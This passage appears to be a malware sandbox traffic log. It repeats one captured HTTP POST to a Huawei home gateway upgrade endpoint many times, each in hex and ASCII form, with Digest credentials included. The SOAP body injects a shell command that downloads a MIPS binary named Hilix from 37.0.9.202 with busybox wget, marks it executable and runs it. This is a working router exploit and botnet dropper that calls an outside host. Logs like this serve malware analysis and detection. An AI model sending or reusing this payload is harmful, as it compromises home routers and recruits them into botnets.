-r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 33 37 2e 30 2e 39 2e 32 30 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 37.0.9.202 -l /tmp/binary -r /bins/Hilix.mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
